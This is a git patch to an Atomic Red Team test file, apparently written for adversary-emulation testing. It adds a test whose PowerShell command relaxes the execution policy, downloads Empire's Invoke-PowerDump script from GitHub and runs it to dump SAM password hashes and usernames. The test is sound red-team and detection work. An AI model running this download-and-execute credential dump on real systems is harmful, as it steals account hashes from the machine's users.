From f4d059dbbcc7310a19728fa241d43ec11ec2a4d3 Mon Sep 17 00:00:00 2001 From: Jesse Moore Date: Sat, 15 Aug 2020 20:31:19 -0600 Subject: [PATCH] Update T1003.002.yaml for PowerDump (#1196) * Update T1003.002.yaml for PowerDump Added PowerDump to parse SAM and SYSTEM for usernames and Hash * Add fixes Updated with fixes. Its not erroring with Multiple cleanup Removed preReqs, don't need them Removed SAM and SYSTEM file dep... PowerDump can just Dump Registry for Hashes and Usernames * Getting permanent links to file Added permanent link to PowerDump in BC-SECURITY Github * updated description Co-authored-by: Carrie Roberts --- atomics/T1003.002/T1003.002.yaml | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index ae3312a1..5ba30d65 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -78,4 +78,18 @@ atomic_tests: del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} name: command_prompt elevation_required: true - \ No newline at end of file + +- name: PowerDump Registry dump of SAM for hashes and usernames + description: Executes a hashdump by reading the hasshes from the registry. + supported_platforms: + - windows + executor: + command: |- + Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green + Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore + Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" + Import-Module .\PowerDump.ps1 + Invoke-PowerDump + name: powershell + elevation_required: true +